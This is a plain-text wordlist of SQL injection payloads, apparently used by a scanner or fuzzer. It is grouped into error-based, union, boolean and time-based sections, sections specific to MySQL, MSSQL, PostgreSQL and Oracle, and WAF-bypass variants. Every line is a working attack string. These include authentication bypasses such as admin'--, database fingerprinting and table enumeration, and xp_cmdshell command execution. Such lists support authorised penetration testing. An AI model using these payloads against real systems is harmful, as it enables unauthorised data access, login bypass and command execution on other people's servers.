# SQL Injection Payloads
# Format: payload (one per line)
# Lines starting with # are comments

# ========================
# Error-Based Payloads
# ========================
'
''
`
``
,
"
""
/
//
\
\\
;
' or '
' or 1=1
' or 1=1--
' or 1=1#
' or 1=1/*
') or ('1'='1
')) or (('1'='1
' OR '1'='1
" OR "1"="1
' OR 1=1--
" OR 1=1--
' OR 'x'='x
1' OR '1'='1

# ========================
# Union-Based Payloads
# ========================
' UNION SELECT NULL--
' UNION SELECT NULL,NULL--
' UNION SELECT NULL,NULL,NULL--
' UNION ALL SELECT NULL--
' UNION ALL SELECT 1,2,3--
' UNION SELECT 1,@@version--
' UNION SELECT 1,2,@@version--
1 UNION SELECT NULL--
1 UNION ALL SELECT NULL,NULL--

# ========================
# Boolean-Based Payloads
# ========================
' AND 1=1--
' AND 1=2--
' AND 'a'='a'--
' AND 'a'='b'--
1 AND 1=1
1 AND 1=2
1' AND '1'='1
1' AND '1'='2

# ========================
# Time-Based Payloads
# ========================
'; WAITFOR DELAY '0:0:5'--
'; SELECT SLEEP(5)--
1; WAITFOR DELAY '0:0:5'--
1; SELECT SLEEP(5)--
' OR SLEEP(5)--
' OR SLEEP(5)='
1' OR SLEEP(5)='1
"; SELECT SLEEP(5)--
1); SELECT SLEEP(5)--
1)); SELECT SLEEP(5)--
'; SELECT pg_sleep(5)--
'; SELECT pg_sleep(5) FROM users--
1; SELECT pg_sleep(5)--

# ========================
# MySQL Specific
# ========================
' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)--
' UNION SELECT 1,version(),3--
' UNION SELECT 1,user(),3--
' UNION SELECT 1,database(),3--
' UNION SELECT 1,@@datadir,3--
' UNION SELECT 1,table_name,3 FROM information_schema.tables--

# ========================
# MSSQL Specific
# ========================
'; EXEC xp_cmdshell('whoami')--
'; EXEC master..xp_cmdshell 'ping 127.0.0.1'--
' UNION SELECT 1,@@version,3--
' UNION SELECT 1,DB_NAME(),3--
' UNION SELECT 1,USER_NAME(),3--

# ========================
# PostgreSQL Specific
# ========================
'; SELECT version()--
'; SELECT current_user--
'; SELECT pg_sleep(5)--
' UNION SELECT NULL,version()--
' UNION SELECT NULL,current_user--

# ========================
# Oracle Specific
# ========================
' UNION SELECT NULL FROM DUAL--
' UNION SELECT NULL,NULL FROM DUAL--
' UNION SELECT 1,banner FROM v$version--
' OR 1=1--
' OR 'a'='a

# ========================
# WAF Bypass Techniques
# ========================
'/**/OR/**/1=1--
'%09OR%091=1--
' /*!OR*/ 1=1--
'%0aOR%0a1=1--
'+OR+1=1--
'%20OR%201=1--
admin'--
admin' #
admin'/*
' or 1=1 limit 1 -- -+
